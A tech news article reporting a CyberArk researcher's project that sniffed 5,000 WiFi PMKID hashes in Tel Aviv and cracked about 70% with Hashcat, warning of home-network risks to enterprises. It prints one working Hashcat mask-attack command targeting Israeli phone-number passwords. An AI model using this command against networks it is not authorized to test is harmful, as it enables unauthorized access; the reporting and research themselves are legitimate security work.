Skip to content

Search the site

Security researcher harvests 5,000 encrypted WiFi passwords, cracks 70%

2,200 passwords cracked with a single HashCat command

A security researcher at Cyberark strolling the streets of Tel Aviv with a $50 network card and associated WiFi sniffing kit harvested 5,000 encrypted WiFi network passwords, then cracked 70% of them using password decryptor HashCat -- running on an admittedly beefy rig (eight NVIDIA Quadro RTX 8000 graphics cards: worth about £30,000) in the security firms offices -- in an attack that flags anew the risks around poor WiFi security.

As Ido Hoorvitch noted in a detailed blog on the hugely successful WiFi hacking project on October 26: "With the continued shift to remote work due to the pandemic, securing home networks has become imperative and poses a risk to the enterprise if not done so. Home networks rarely have the same controls as enterprise networks. And a security program is only as strong as its weakest link." (Among the companies hit via a penetration that started at router level recently is T-Mobile...)

"Concerning the enterprise", Hoorvitch added, "it’s possible for an attacker to gain initial access to a remote user’s WiFi and then hop to the user’s computer and wait for a VPN connection or for the user to go to the office and move laterally from there."

He noted: "While this research was conducted in Tel Aviv, the routers that were susceptible to this attack — from many of the world’s largest vendors — are used by households and businesses worldwide."

Hilariously/worryingly, using a simple Hashcat command that tried all the possible cellphone numbers combinations in Israel (which have the prefix '05'), he immediately cracked 2,200 passwords.

(Choose and use complex passwords, as ever, one and all...)

sudo hashcat -a 3 -w4 -m 22000 /home/tuser/hashes/Wi-Fi_pmkid_hash_22000_file.txt 05?d?d?d?d?d?d?d?d -o /home/tuser/hashes/pmkid_cracked.txt

Technical details, including on using a known vulnerability in RSN IE (Robust Security Network Information Element) to retrieve a PMKID hash and a blow-by-blow account of the campaign can be found here.

See also: From the Slack API to queued print jobs, hackers are getting estoeric with their C2 channels